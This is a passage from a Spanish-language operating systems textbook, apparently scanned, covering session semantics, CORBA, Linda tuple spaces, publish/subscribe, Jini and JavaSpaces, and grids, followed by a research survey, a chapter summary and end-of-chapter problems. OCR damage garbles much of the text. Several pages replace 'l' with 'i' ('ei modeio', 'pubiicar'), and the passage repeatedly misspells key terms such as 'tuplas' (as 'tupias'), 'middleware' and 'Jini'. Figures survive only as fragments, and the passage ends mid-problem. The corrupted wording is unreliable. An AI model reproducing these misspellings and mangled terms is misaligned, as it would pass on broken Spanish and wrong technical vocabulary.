en un principio sólo para el proceso que los hizo. Sólo hasta que se cierre el archivo podrán ser vi¬ 
sibles los cambios para los demás procesos". La adopción de dicha regla no cambia lo que ocurre 
en la figura 8-38(b), pero sí redefine el comportamiento actual (B recibe el valor original del archi¬ 
vo) como correcto. Cuando el cliente 1 cierra el archivo, envía una copia devuelta al servidor pa¬ 
ra que las llamadas subsiguientes a read obtengan el nuevo valor, como se requiere. En efecto, éste 
es el modelo de envío/descarga de la figura 8-36. Esta regla semántica se implementa ampliamen¬ 
te, y se conoce como semántica de sesión. 

Al utilizar la semántica de sesión surge la cuestión de lo que ocurre si dos o más clientes están 
usando caché y modificando el mismo archivo a la vez. U na solución es que a medida que se vaya 
cerrando cada archivo, su valor se envíe de vuelta al servidor, por lo que el resultado final dependerá 
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de cuál archivo cierre al último. Una alternativa menos placentera pero un poco más fácil de imple- 
mentar es que el resultado final sea uno de los candidatos, pero dejar sin especificar la opción de 
cuál archivo se debe elegir. 

Un método alternativo a la semántica de sesión es utilizar el modelo de envío/descarga, pero 
bloquear de manera automática un archivo que se haya descargado. Cuando otros clientes intenten 
descargar el archivo, se quedarán en espera hasta que el primer cliente lo haya regresado. Si hay 
mucha demanda por el archivo, el servidor podría enviar mensajes al cliente que contiene el archi¬ 
vo para pedirle que se apure, y tal vez eso ayude o tal vez no. En general, es difícil obtener la se¬ 
mántica correcta de los archivos compartidos sin soluciones elegantes y eficientes. 

8.4.5 M iddieware basado en objetos 

Ahora vamos a analizar un tercer paradigma. En vez de decir que todo es un documento o que to¬ 
do es un archivo, decimos que todo es un objeto. Un objeto es una colección de variables que se 
incluyen con un conjunto de procedimientos de acceso, llamados métodos. No se permite que los 
procesos accedan directamente a las variables. En vez de ello, tienen que invocar los métodos. 

Algunos lenguajes de programación como C-I--I- y java son orientados a objetos, pero éstos son 
objetos a nivel de lenguaje en vez de objetos en tiempo de ejecución. U n sistema muy conocido que se 
basa en objetos en tiempo de ejecución es C ORBA (C ommon O bject Request B roker Architechture, A r- 
quitectura común de intermediarios en peticiones a objetos) (Vinoski, 1997). CORBA es un sistema 
cliente-servidor, en el que los procesos cliente en máquinas cliente pueden invocar operaciones en ob¬ 
jetos ubicados en máquinas servidores (posiblemente remotos). CORBA se diseñó para un sistema he¬ 
terogéneo que ejecuta una variedad de plataformas de hardware y sistema operativos, programado en 
una variedad de lenguajes. Para que sea posible que un cliente en una plataforma invo que a un servi¬ 
dor en una plataforma distinta, se interponen ORBs Object Request Broker (Intermediarios en peticio¬ 
nes a objetos) entre el clientey el servidor para permitir que coincidan. Los ORBs desempeñan un papel 
tan importante en CORBA que hasta incluyen su nombre en el sistema. 

Cada objeto CORBA se define mediante una definición de interfaz en un lenguaje conocido co¬ 
mo IDL (Interfaz Definition Language, Lenguaje de definición de interfaz), el cual indica qué mé¬ 
todos debe exportar el objeto y qué tipos de parámetros espera cada método. La especificación del 
IDL se puede compilar en un procedimiento de resguardo del cliente y se puede almacenar en una 
biblioteca. Si un proceso cliente sabe de antemano que necesitará acceder a cierto objeto, se vincu¬ 
la con el código de resguardo del cliente del objeto. La especificación IDL también se puede compilar 
en un procedimiento esqueleto que se utiliza en el lado servidor. Si un proceso no sabe de antema¬ 
no cuáles objetos CORBA va a necesitar también es posible la invocación dinámica, pero su funcio¬ 
namiento es algo que está más allá del alcance de este libro. 

Cuando se crea un objeto CORBA también se crea una referencia a este objeto y se devuelve 
al proceso que lo creó. Esta referencia es la forma en que el proceso identifica al objeto para las 
subsiguientes invocaciones de sus métodos. La referencia se puede pasar a otros procesos, o se pue¬ 
de almacenar en un directorio de objetos. 

Para que un proceso cliente pueda invocara un método sobre un objeto, debe adquirir primero 
una referencia al objeto. La referencia puede provenir directamente del proceso que lo creó, pero es 
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más probable que los busque por nombre o por función en algún tipo de directorio. U na vez que es¬ 
tá disponible la referencia al objeto, el proceso cliente organiza los parámetros para las llamadas a 
los métodos en una estructura conveniente y después se pone en contacto con el ORB cliente. A su 
vez, el ORB cliente envía un mensaje al ORB servidor, el cual invoca al método del objeto. Todo 
el mecanismo es similar a RPC. 

La función de los ORBs es ocultar al código cliente y servidor todos los detalles de distribu¬ 
ción y comunicación de bajo nivel. En especial, los ORBs ocultan al cliente la ubicación del servi¬ 
dor, si éste es un programa binario o una secuencia de comandos, en qué hardware y sistema 
operativo se ejecuta el servidor, si el objeto está activo en ese momento y cómo se comunican los 
dos ORBs (por ejemplo, TCP/IP, RPC, memoria compartida, etcétera.). 

En la primera versión deCORBA,no se especificaba el protocolo entre el ORB cliente y el 
ORB servidor. Como resultado, cada distribuidor de ORBs utilizaba un protocolo distinto y los 
ORBs de un distribuidor no se podían comunicar con los de los otros distribuidores. En la versión 
2.0 se especificó el protocolo. Para comunicarse a través de Internet, el protocolo se llama IlOP 
(Internet InterOrb Protocol, Protocolo InterOrb de Internet). 

Para que sea posible utilizaren los sistemas CORBA objetos que no se hayan escrito paraCOR- 
BA, cada objeto se puede equipar con un adaptador de objeto. Esto es una envoltura que maneja 
las tareas como el registro del objeto, la generación de referencias al objeto y su activación, si se 
invoca cuando no esté activo. La distribución de todas estas partes de CORBA se muestra en la fi¬ 
gura 8-39. 


Código 

cliente 



\ 

Red 


Figura 8-39. Los principales elementos de un sistema distribuido basado en CORBA. 
Las partes de CORBA se muestran en color gris. 


Un problema grave con CORBA es que cada objeto se encuentra sólo en un servidor, lo cual 
significa que el rendimiento será terrible para los objetos que se utilizan con mucha frecuencia en 
máquinas cliente por todo el mundo. En la práctica, CORBA sólo funciona de manera aceptable 
en los sistemas de pequeña escala, como los que se utilizan para conectar procesos en una compu¬ 
tadora, una LAN o dentro de una sola empresa. 
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8.4.6 M iddieware basado en coordinación 

Nuestro último paradigma para un sistema distribuido se llama middieware basado en coordina¬ 
ción. Empezaremos con el sistema Linda, un proyecto académico de investigación que inició todo 
el campo, y después analizaremos dos ejemplos comerciales que se inspiraron en gran parte en el 
sistema Linda: publicar/suscribir y j ini. 

Linda 

David Gelernter y su estudiante Nick Carnero (Carnero y Gelernter, 1986; Carnero y Gelernter, 
1989; Gelernter, 1985) desarrollaron en la Universidad deYaleel sistema Linda, el cual es un sis¬ 
tema novel para comunicación y sincronización. En Linda, los procesos independientes se comuni¬ 
can mediante un espacio de tupias abstracto. El espacio de tupias es global para todo el sistema, y 
los procesos en cualquier máquina pueden insertar o quitar tupi as en el espacio de tupias sin impor¬ 
taren dónde estén almacenadas. Para el usuario, el espacio detuplas parece una gran memoria com¬ 
partida global, como hemos visto en varias formas anteriores, como en la figura 8-21(c). 

Una tupia escomo una estructura en C o java. Consiste en uno o más campos, cada uno de los 
cuales es un valor de cierto tipo, soportado por el lenguaje base (para implementar a Linda se agre¬ 
ga una biblioteca a un lenguaje existente, como C). Para C-Linda, los tipos de campos pueden ser 
enteros, enteros largos y números de punto flotante, y también tipos compuestos como arreglos (in¬ 
cluyendo cadenas) y estructuras (pero no otras tupias). A diferencia de los objetos, las tupias son só¬ 
lo datos: no tienen métodos asociados. En la figura 8-40 se muestran tres ejemplos detuplas. 

(“abe”,2,5) 

(“matriz-1”,1,6, 3.14) 

(“familia”, “es-hermana”, “Stephany”, “Roberta”) 

Figura 8-40. Tres tupias en Linda. 

Las tupias pueden tener cuatro operaciones. La primera (out) coloca una tupia en el espacio de 
tupias. Por ejemplo, 

out(“abc”, 2,5); 

coloca la tupia ("abe", 2, 5) en el espacio de tupias. Por lo general, los campos de out son constan¬ 
tes, variables o expresiones, como en 

out(“matriz-1”, i, j, 3.14); 

que envía una tupia con cuatro campos, de los cuales el segundo y el tercero se determinan con ba¬ 
se en los valores actuales de las variables i y j. 

Para obtener tupias del espacio de tupias se utiliza la primitiva in. Se tratan por contenido y no 
por nombre o dirección. Los campos de in pueden ser expresiones de parámetros formales. Por 
ejemplo, considere 
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in(“abc”, 2, ?i); 

Esta operación "busca" en el espacio de tupias una tupia que consista en la cadena "abe", el entero 
2 y un tercer campo que contenga cualquier entero (suponiendo que i sea un entero). Si la encuentra, 
la tupia se elimina del espacio de tupias y a la variable i se le asigna el valor del tercer campo. Las 
operaciones de buscar la coincidencia y eliminarla son atómicas, por lo que si dos procesos ejecutan 
la misma operación in al mismo tiempo, sólo uno de ellos tendrá éxito a menos que haya dos o más 
tupias que coincidan. I nclusive, el espacio de tupias puede contener varias copias de la misma tupia. 

El algoritmo para buscar coincidencias que utiliza in es simple. Los campos de la primitiva in, 
que se conocen como la plantilla, se comparan (en concepto) con los campos correspondientes de 
todas las tupias en el espacio de tupias. Se produce una coincidencia si se cumplen las siguientes 
tres condiciones: 

1. La plantilla y la tupia tienen el mismo número de campos. 

2. Los tipos de los campos correspondientes son iguales. 

3. Cada constante o variable en la plantilla coincide con el campo de su tupia. 

Los parámetros formales, que se indican mediante un signo de interrogación seguido del nombre o 
tipo de una variable, no participan en la búsqueda de coincidencias (excepto para la comprobación 
de los tipos), aunque los parámetros que contienen el nombre de una variable se asignan después de 
una coincidencia exitosa. 

Si no hay una tupia que coincida, se suspende el proceso que hizo la llamada hasta que otro pro¬ 
ceso inserte la tupia necesaria, y en ese momento el proceso que hizo la llamada se revive de manera 
automática y recibe la nueva tupia. El hecho de que los procesos se bloqueen o desbloqueen de ma¬ 
nera automática significa que, si un proceso está por enviar una tupia y hay otro proceso a punto de 
recibirla, no importa cuál se ejecuta primero. La única diferencia es que si se realiza la primitiva in 
antes que la primitiva out, habrá un ligero retraso hasta que la tupia esté disponible para removerla. 

Podemos dar varios usos al hecho de que los procesos se bloqueen cuando la tupia que necesi¬ 
tan no está presente. Por ejemplo, se puede utilizar para implementar semáforos. Para crear o reali¬ 
zar una operación up en el semáforo S, un proceso puede ejecutar lo siguiente: 

out(“semaphore S”); 

Para realizar una operación down, ejecuta: 

in(“semaphore S”); 

El estado del semáforo S se determina con base en el número de tupias ("semaphore S") en el es¬ 
pacio de tupias. Si no existe ninguna, cualquier intento por obtener una tupia se bloqueará hasta que 
algún otro proceso suministre una. 

Además de out e in, Linda también tiene una primitiva read, que es igual a in sólo que no qui¬ 
ta la tupia del espacio de tupias. También hay una primitiva eval, la cual hace que sus parámetros 
se evalúen en paralelo y que la tupia resultante se coloque en el espacio de tupias. Podemos utilizar 
este mecanismo para realizar un cálculo arbitrario. Esta es la forma en que se crean los procesos pa¬ 
ralelos en Linda. 
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Publicar/suscribir 

Nuestro siguiente ejempio de un modeio basado en coordinación está inspirado en Linda y se co¬ 
noce como publicar/suscribir (Oki y coi aboradores, 1993). Consiste en varios procesos conecta¬ 
dos poruña red de transmisión. Cada proceso puede ser un productor de información, un consumidor 
de información o ambos. 

Cuando un productor de información tiene una nueva pieza de información (por ejempio, un 
nuevo precio de ias acciones), transmite esa información en ia red como una tupia. A esta acción se 
ie conoce como publicar. Cada tupia contiene una iínea de tema jerárquica, que a su vez contiene 
varios campos separados por puntos. Los procesos interesados en cierta información se pueden sus¬ 
cribir a ciertos temas, para io cuai inciuyen ei uso de comodines en ia iínea de tema. Para reaiizar 
una suscripción, hay que indicar ios temas que se deben buscar a un proceso de demonio de tupia 
en ia misma máquina, que monitorea ias tupias pubiicadas. 

En ia figura 8-41 se iiustra ia manera de impiementar ei modeio de pubi i car/suscribir. Cuan¬ 
do un proceso tiene una tupia que desea pubiicar, ia transmite a ia LAN iocai. Ei demonio de tu¬ 
pia en cada máquina copia en su RAM todas ias tupias que se han transmitido. Después 
inspecciona ia iínea de tema para ver qué procesos están interesados en esa tupia, y reenvía una 
copia a cada proceso interesado. Las tupias también se pueden transmitir a través de una red de 
área ampiia o de Internet, para lo cual una máquina en cada LA N actúa como enrutador de infor¬ 
mación, recolectando todas las tupias publicadas y reenviándolas posteriormente a otras LA Ns pa¬ 
ra que las vuelvan a transmitir. Este reenvío también se puede realizar de manera inteligente, en 
donde sólo se reenvía una tupia a una LAN remota si ésta tiene por lo menos un suscriptor que 
quiera esa tupia. Para hacer esto, los enrutadores de información deben intercambiar datos sobre 
los suscriptores. 


Productor 



Enrutador de información 


Figura 8-41. La arquitectura del modelo publicar/suscribir. 


Se pueden impiementar varios tipos de semántica, incluyendo una entrega confiable y una en¬ 
trega garantizada, aun cuando exista la posibilidad de fallas. En el último caso es necesario alma¬ 
cenar tupias anteriores, en caso de que se necesiten posteriormente. Una manera de almacenarlas es 
conectar un sistema de base de datos al sistema y hacer que se suscriba a todas las tupias. Para ello. 
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hay que envolver el sistema de base de datos en un adaptador, para permitir que una base de datos 
existente funcione con ei modeio de pubiicar/suscribir. A medida que iieguen ias tupias, ei adapta¬ 
dor ias capturará y ias coiocará en ia base de datos. 

Ei modeio de pubiicar/suscribir desacopia por compieto a ios productores de ios consumidores, 
deiguai forma que Linda. Sin embargo, aigunas veces es útii saber quién más está ahí. Para adqui¬ 
rir esta información hay que pubiicar una tupia que reaiice esta pregunta básica: "¿Ouién más está 
interesado en x?". Las respuestas iiegan en forma de tupias que dicen: "Yo estoy interesado en x". 


J ini 

Durante 50 años ia computación ha estado centrada en ia CPU, en donde una computadora es un 
dispositivo independiente que consiste en una CPU, memoria primaria y casi siempre aigún dispo¬ 
sitivo de aimacenamiento masivo, como un disco. Ei modeio J ini (una variación de ia paiabra "ge¬ 
nio" en ingiés) de Sun M icrosystems es un intento por cambiar ese modeio a uno que se podría 
describir como centrado en ia red (Waido, 1999). 

Ei mundo dejini consiste en un gran número de dispositivos]ini auto-contenidos, cada uno 
de ios cuaies ofrece uno o más servicios a ios demás. Un dispositivo] ini se puede conectar en una 
red y empezar a ofrecer y utiiizar servicios ai instante, sin necesidad de un procedimiento de ins- 
taiación compiejo. Hay que tener en cuenta que ios dispositivos se conectan a una red, y no a una 
computadora como se hace comúnmente. U n dispositivo] ini podría ser una computadora tradicio- 
nai, pero también podría ser una impresora, una computadora de boisiiio, un teiéfono ceiuiar, una 
teievisión, un estéreo u otro dispositivo con una CPU, aigo de memoria y una conexión de red (po- 
sibiemente inaiámbrica). Un sistema]ini es una federación iibre de dispositivos]ini que pueden 
operar según sea su voiuntad, sin una administración centrai. 

Cuando un dispositivo ]ini desea unirse a ia federación ] ini, transmite un paquete en ia LAN 
iocai o en ia ceida inaiámbrica iocai, preguntando si hay un servicio de búsqueda presente. Ei pro- 
tocoio que se utiiiza para encontrar un servicio de búsqueda es ei protocoio de descubrimiento, y 
es uno deios pocos protocoios fijos enjini (como aiternativa, ei nuevo dispositivo] ini puede espe¬ 
rar hasta que iiegue uno de ios anuncios periódicos dei servicio de búsqueda, pero en este iibro no 
anaiizaremos ese mecanismo). 

Cuando ei servicio de búsqueda detecta que un nuevo dispositivo se quiere registrar, respon¬ 
de con una pieza de código que puede reaiizar ei registro. Como ] ini es un sistema desarroiiado 
exciusivamente en ]ava, ei código que se envía está en] VM (ei ienguaje de ia máquina virtuai de 
]ava), que todos ios dispositivos] ini deben ser capaces de ejecutar, por io generai mediante un in¬ 
térprete. A hora ei nuevo dispositivo ejecuta ei código, que se contacta con ei servicio de búsque¬ 
da y io registra durante cierto periodo fijo. Ei dispositivo se puede voiver a registrar si io desea, 
justo antes de que expire tiempo. Este mecanismo impiica que un dispositivo] ini puede saiir dei 
sistema con sóio apagarse, y se oividará pronto su anterior existencia, sin necesidad de una admi¬ 
nistración centrai. Ai concepto de registrarse por un intervaio fijo se ie conoce como adquirir una 
concesión. 

Observe que como ei código para registrar ei dispositivo se descarga en ei mismo, se puede 
cambiar a medida que evoiucione ei sistema, sin afectar ai hardware o software dei dispositivo. De 
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hecho, el dispositivo ni siquiera conoce ei protocoio de registro. La parte que ei dispositivo conoce 
sobre ei proceso de registro consiste en proveer ciertos atributos y código de proxy que otros dis¬ 
positivos utiiizarán después para acceder a este dispositivo. 

U n dispositivo o usuario que busque un servicio específico podrá preguntar ai servicio de bús¬ 
queda si conoce uno. La petición puede invoiucrar aigunos de ios atributos que utiiizan ios dispo¬ 
sitivos ai registrarse, Si ia petición tiene éxito, ei proxy que suministró ei dispositivo ai momento 
de registrarse se devueive ai dispositivo que hizo ia petición, y se ejecuta para contactarse con ei 
dispositivo. Así, un dispositivo o usuario puede habiar con otro dispositivo sin necesidad de saber 
en dónde se encuentra ni qué protocoio utiiiza. 

Los Chentes y servicios dejini (dispositivos de hardware o software) se comunican y sincro¬ 
nizan mediante ei uso de J avaSpaces, que se modeian en ei espacio de tupias de Linda, pero con 
aigunas diferencias importantes. Cada javaSpace consiste en cierto número de entradas fuerte¬ 
mente tipificadas. Las entradas son como tupias de Linda, excepto que son fuertemente tipifica¬ 
das, mientras que ias tupias de Linda no tienen tipo. Cada entrada consiste en cierto número de 
campos, cada uno de ios cuaies tiene un tipo básico de j ava. Por ejempio, una entrada de tipo em- 
pieado podría consistir en una cadena (para ei nombre de ia persona), un entero (para su depar¬ 
tamento), un segundo entero (para ia extensión teiefónica) y un vaior Booieano (para saber si 
trabaja tiempo compieto). 

En javaSpace sóio se definen cuatro métodos (aunque dos deeiios tienen una forma variante): 

1. Write: coioca una nueva entrada en ei javaSpace. 

2. Read: copia una entrada que coincide con una piantiiia y ia saca dei j avaSpace. 

3. Take: copia y eiimina una entrada que coincide con una piantiiia. 

4. Notify: notifica ai proceso que hizo ia iiamada cuando se escribe una entrada que coincida. 

Ei método write proporciona ia entrada y especifica su tiempo de concesión; es decir, cuándo se de¬ 
be descartar. Por ei contrario, ias tupias de Linda permanecen hasta que se quitan. Un javaSpace 
puede contener i a misma entrada varias veces, por i o que no es un conjunto matemático (ai iguai 
que en Linda). 

Los métodos read y take proporcionan una piantiiia para ia entrada que se está buscando. Ca¬ 
da campo en ia piantiiia puede contener un vaior específico que debe coincidir, o puede contener 
un comodín "no importa" que coincida con todos ios vaiores dei tipo apropiado. Si se encuentra una 
coincidencia se devueive, y en ei caso de take, también se eiimina dei javaSpace. Cada uno de es¬ 
tos métodos de j avaSpace tienen dos variantes, que difieren en ei caso en que ninguna entrada coin¬ 
cida. Una variante devueive una indicación de faiia de inmediato: ia otra espera hasta que haya 
expirado cierto tiempo iímite (que se proporciona como parámetro). 

Ei método notify registra ei interés en cierta piantiiia. Si después se introduce una entrada que 
coincida, se invoca ai método notify dei proceso que hizo ia iiamada. 
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A diferencia dei espacio de tupias de Linda, JavaSpace soporta ias transacciones atómicas. Ai 
utiiizar estas transacciones se pueden agrupar varios métodos. Puede ser que todos se ejecuten, o 
que ninguno se ejecute. Durante ia transacción, ias modificaciones en ei JavaSpace no son visibies 
fuera de ia transacción. Los demás procesos que hacen ia iiamada podrán ver ios cambios sóio has¬ 
ta que termine i a transacción. 

j avaSpace se puede utiiizar para sincronizar procesos que se comunican entre sí. Por ejempio, 
en una situación de productor-consumidor, ei productor coioca eiementos en un j avaSpace a medi¬ 
da que ios produce. Ei consumidor ios quita con take y se bioquea si no hay eiementos disponibies. 
j avaSpace garantiza que cada uno de ios métodos se ejecute en forma atómica, por io que no hay 
peiigro de que un proceso trate de ieer una entrada que sóio se encuentre a ia mitad. 


8.4.7 Grids(Mallas) 

Ningún anáiisis de sistemas distribuidos estaría compieto sin por io menos mencionar un desarro- 
iio reciente, que se puede hacer importante en ei futuro: ios grids. Un grid es una gran coiección de 
máquinas dispersas geográficamente y poriogenerai heterogénea, que se conecta mediante una red 
privada o Internet, y que ofrece un conjunto de servicios para sus usuarios. A igunas veces se iecom¬ 
para con una supercomputadora virtuai, pero es más que eso. Es una coiección de computadoras in¬ 
dependientes, poriogenerai en varios dominios administrativos, ias cuai es ejecutan un nivei común 
de middieware para permitir que ios programas y usuarios accedan a todos ios recursos de una ma¬ 
nera conveniente y consistente. 

La motivación originai para construir un grid fue ia compartición de ios cicios de ia CPU. La 
idea es que cuando una organización no necesita todo su poder de cómputo (por ejempio, en ia no¬ 
che), otra organización (que tai vez se encuentre a varias zonas horarias de distancia) podría reco- 
iectar esos cicios y después regresarie ei favor 12 horas más tarde. A hora, ios investigadores de ios 
grids también están interesados en compartir otros recursos, específicamente ei hardware especia- 
iizado y ias bases de datos. 

Por io generai, ios grids funcionan así: cada máquina participante ejecuta un conjunto de pro¬ 
gramas que administran ia máquina y ia integran en ei grid. Este software comúnmente se encarga 
de ia autenticación y ei inicio de sesión de ios usuarios remotos, de anunciar y descubrir recursos, 
programar y ubicar trabajos, etcétera. Cuando un usuario tiene que hacer un trabajo, ei software dei 
grid determina en dónde hay capacidad inactiva que tenga ios recursos de hardware, software y de 
datos para reaiizar ei trabajo, y después envía ei trabajo ahí, prepara su ejecución y después devuei- 
ve ios resuitados ai usuario. 

Un middieware popuiar en ei mundo de ios grids es Globus Tool kit, que está disponibie para 
varias piataformas y soporta muchos estándares (emergentes) de grids (Foster, 2005). Giobus pro¬ 
vee un marco de trabajo para que ios usuarios compartan computadoras, archivos y otros recursos 
de una manera fiexibie y segura, sin sacrificar ia autonomía iocai. Se utiiiza como base para cons¬ 
truir muchas apiicaciones distribuidas. 
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8.5 INVESTIGACIÓN SOBRE LOS SISTEMAS 
DE MÚLTIPLES PROCESADORES 

En este capítulo hemos analizado cuatro tipos de sistemas de múltiples procesadores: multiproce- 
sadores, multicomputadoras, máquinas virtuales y sistemas distribuidos. También analizaremos con 
brevedad la investigación realizada en estas áreas. 

La mayor parte de la investigación en los multiprocesadores se relaciona con el hardware, en es¬ 
pecial la forma de construir la memoria compartida y mantenerla coherente (por ejemplo, Higham y 
colaboradores, 2007). Sin embargo, también se han realizado otros trabajos sobre los multi procesado¬ 
res, en especial los multi procesadores de chip, incluyendo los modelos de programación y las cuestio¬ 
nes del sistema operativo para los multiprocesadoresdechip (Fedorova y colaboradores, 2005; Tan y 
colaboradores, 2007), los mecanismos de comunicación (Brisolara y colaboradores, 2007), la admi¬ 
nistración de la energía mediante software (Park y colaboradores, 2007), la seguridad (Yang y Peng, 
2006) y, desde luego, los futuros retos (Wolf, 2004). Además, la planificación es un tema siempre po¬ 
pular (Chen y colaboradores, 2007; Lin y Rajaraman, 2007; Rajagolapan y colaboradores, 2007; Tam 
y colaboradores, 2007; Yahav y colaboradores, 2007). 

Es mucho más fácil construir multicomputadoras que multi procesadores. Todo lo que se nece¬ 
sita es una colección de PCs o estaciones de trabajo y una red de alta velocidad. Por esta razón, son 
un popular tema de investigación en las universidades. Gran parte del trabajo se relaciona con la 
memoria compartida distribuida en una forma u otra. Algunas veces se basa en páginas, pero otras 
se basa por completo en software (Byung-FIyun y colaboradores, 2004; Chapman y Fleiser, 2005; 
Fluang y colaboradores, 2001; Kontothanassis y colaboradores, 2005; Nikolopoulos y colaborado¬ 
res, 2001; Zhang y colaboradores, 2006). También se están analizando los modelos de programa¬ 
ción (Dean y Ghemawat, 2004). El uso de energía en los grandes centros de datos es una de las 
cuestiones (Bash y Forman, 2007; Ganesh y colaboradores, 2007; Villa, 2006), al igual que escalar 
adecenas de miles deCPUs(Friedrichy Rolla, 2007). 

Las máquinas virtuales son un tema muy activo, con muchos artículos sobre distintos aspectos 
del tema, incluyendo la administración de energía (M oore y colaboradores, 2005; Stoessy colabora¬ 
dores, 2007), la administración de memoria (Lu y Shen, 2007) y la administración de la confianza 
(Garfinkel y colaboradores, 2003; Lie y colaboradores, 2003). También hay que tener en cuenta la 
seguridad (jaeger y colaboradores, 2007). La optimización del rendimiento es también un tema de 
gran interés, en especial el rendimiento de la CPU (King y colaboradores, 2003), el rendimiento 
de la red (M enon y colaboradores, 2006) y el rendimiento de la E/S (Cherkasova y Gardner, 2005; 
Liu y colaboradores, 2006). Las máquinas virtuales hacen posible la migración, por lo que hay inte¬ 
rés en ese tema (Bradford y colaboradores, 2007; Fluang y colaboradores, 2007). Las máquinas vir¬ 
tuales también se han utilizado para depurar sistemas operativos (King y colaboradores, 2005). 

Con el crecimiento de la computación distribuida, se ha realizado mucha investigación sóbrelos 
sistemas de archivos y almacenamiento distribuidos, incluyendo cuestiones como la capacidad de 
manutención a largo plazo frente a fallas de hardware y software, los errores humanos y las rupturas 
en el entorno (Baker y colaboradores, 2006; Kotlay colaboradores, 2007; M aniatisy colaboradores, 
2005; Shah y colaboradores, 2007; Storery colaboradores, 2007), el uso de servidores desconfiables 
(Adya y colaboradores, 2002; Popescu y colaboradores, 2003), la autenticación (Kaminsky y 
colaboradores, 2003), y la escalabilidad en los sistemas de archivos distribuidos (Ghemawat y co- 
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laboradores, 2003; Salto, 2002; Weil y colaboradores, 2006). Se ha Investigado sobre la extensión de 
los sistemas de archivos distribuidos (Peek y colaboradores, 2007). También se han examinado am¬ 
pliamente los sistemas de archivos distribuidos punto a punto (Dabek y colaboradores, 2001; Gum- 
madl y colaboradores, 2003; M uthltacharoen y colaboradores, 2002; Rowstron y Druschel, 2001). 
Ahora que algunos de los nodos son móviles, la eficiencia de la energía también es una cuestión 
Importante (NIghtIngaley Fllnn, 2004). 


8.6 RESUMEN 

Los sistemas computaclonales se pueden hacer más rápidos y confiables mediante el uso de varias 
CPUs. Hay cuatro organizaciones para los sistemas con múltiples CPUs: multlprocesadores, multl- 
computadoras, máquinas virtuales y sistemas distribuidos. Cada una de estas organizaciones tiene 
sus propiedades y cuestiones. 

Un multiprocesador consiste en dos o más CPUs que comparten una RAM común. Las CPUs 
se pueden Interconectar mediante un bus, un conmutador de barras cruzadas o una red de conmu¬ 
tación multletapa. Hay varias configuraciones posibles de sistemas operativos: otorgar a cada CPU 
su propio sistema operativo, que haya un sistema operativo maestro y el resto sean esclavos, o te¬ 
ner un multiprocesador simétrico, en el cual hay una copla del sistema operativo que cualquier CPU 
puede ejecutar. En el último caso se requieren bloqueos para proveer sincronización. Cuando no hay 
un bloqueo disponible, una CPU puede girar o realizar un cambio de contexto. Hay varios algorit¬ 
mos de programación posibles: tiempo compartido, espacio compartido y planificación por pandilla. 

Las multicomputadoras también tienen dos o más CPUs, pero cada una de estas CPUs tienen 
su propia memoria privada. No comparten ningún tipo de RAM común, por lo que toda la comuni¬ 
cación utiliza el paso de mensajes. En algunos casos, la tarjeta de Interfaz de red tiene su propia 
CPU, en cuyo caso la comunicación entre la CPU principal y la CPU de la tarjeta de Interfaz tiene 
que organizarse con cuidado para evitar condiciones de carrera. A menudo, la comunicación a ni¬ 
vel de usuario en las multicomputadoras utiliza llamadas a procedimientos remotos, pero también 
se puede utilizar la memoria compartida distribuida. U na de las cuestiones aquí es el balance de car¬ 
ga de los procesos, y los diversos algoritmos que se utilizan son: algoritmos Iniciados por el emi¬ 
sor, algoritmos Iniciados por el receptor y algoritmos de subasta. 

Las máquinas virtuales permiten que una o más CPUs provean la Ilusión deque hay más CPUs 
de las que realmente se tienen. De esta forma, es posible ejecutar varios sistemas operativos o va¬ 
rias versiones (Incompatibles) del mismo sistema operativo al mismo tiempo, en la misma pieza de 
hardware. Al combinarse con diseños de multinúcleo, cada computadora se convierte entonces en 
una multicomputadora potencial a gran escala. 

Los sistemas distribuidos son sistemas débilmente acoplados, en donde cada uno desús nodos 
es una computadora completa con un conjunto completo de periféricos y su propio sistema operati¬ 
vo. A menudo, estos sistemas se esparcen sobre una gran área geográfica. Con frecuencia se coloca 
middieware encima del sistema operativo para ofrecer un nivel uniforme para que las aplicaciones 
Interactúen con él. Los diversos tipos de middieware son: middieware basado en documentos, basa¬ 
do en archivos, basado en objetos y basado en coordinación. Algunos ejemplos son: World Wlde 
Web, CORBA, Linda y j Inl. 


606 


SISTEMAS DE M ULTIPLES PROCESADORES 


CAPITULO 8 


PROBLEMAS 

1. ¿Se pueden considerar sistemas distribuidos el sistema de grupos de noticias USENET o el proyec¬ 
to SETI@home (SETI@home utiliza varios millones de computadoras personales inactivas que 
analizan los datos radiotelescópicos para buscar inteligencia extraterrestre)? Si es verdad, ¿cómo se 
relacionan con las categorías descritas en la figura 8-1? 

2. ¿Qué ocurre si dosCPUsen un multi procesador intentan utilizar la misma palabra de memoria en el 
mismo instante? 

3. Si una CPU emite una petición de memoria en cada instrucción y la computadora se ejecuta a 200 
M IPS, ¿aproximadamente cuántas CPUs se requieren para saturar un bus de 400 M Hz? Suponga que 
una referencia a memoria requiere un ciclo de bus. Ahora repita este problema para un sistema en 
el que se utiliza caché, y que las memorias caché tienen una tasa de aciertos de 90%. Por último, 
¿qué tasa de aciertos de caché se necesitaría para permitir que 32 CPUs compartan el bus sin sobre¬ 
cargarlo? 

4. Suponga que se rompe el cable entre el conmutador 2A y el conmutador 3B en la red omega de la 
figura 8-5. ¿Quién está desconectado de quién? 

5. ¿Cómo se realiza el manejo de señales en el modelo de la figura 8-7? 

6 . Vuelva a escribir el código entrar_region de la figura 2-22 utilizando sólo lectura para reducir el th- 
rashing inducido por la instrucción tsl. 

7. Las CPU s multinúcleo están empezando a aparecer en las máquinas de escritorio convencionales y 
en las computadoras laptop. No están muy lejanos los equipos de escritorio con decenas o cientos 
de núcleos. U na manera posible de aprovechar este poder es paralelizar las aplicaciones de escrito¬ 
rio estándar, como el procesador de palabras o el navegador Web. Qtra manera posible de aprove¬ 
char el poder es paralelizar los servicios ofrecidos por el sistema operativo (como el procesamiento 
TCP) y los servicios de biblioteca de uso común (como las funciones de biblioteca de http seguro). 
¿Qué método se ve más prometedor? ¿Por qué? 

8 . ¿Son realmente necesarias las regiones críticas en las secciones de código en un sistema operativo 
SM P para evitar condiciones de competencia, o también se pueden utilizar los mutexes en las es¬ 
tructuras de datos? 

9. Cuando se utiliza la instrucción tsl para la sincronización de multi procesadores, el bloque de caché 
que contiene el mutex se transportará de un lado a otro entre la CPU que contiene el bloqueo y la 
CPU que lo solicita, si ambas están en contacto con el bloque. Para reducir el tráfico de bus, la CPU 
que solicita el bloqueo debe ejecutar una instrucción tsl cada 50 ciclos de bus, pero la CPU que 
contiene el bloqueo siempre está en contacto con el bloque de caché entre las instrucciones tsl. Si 
un bloque de caché está compuesto de 16 palabras de 32 bits, cada una de las cuales requiere un ci¬ 
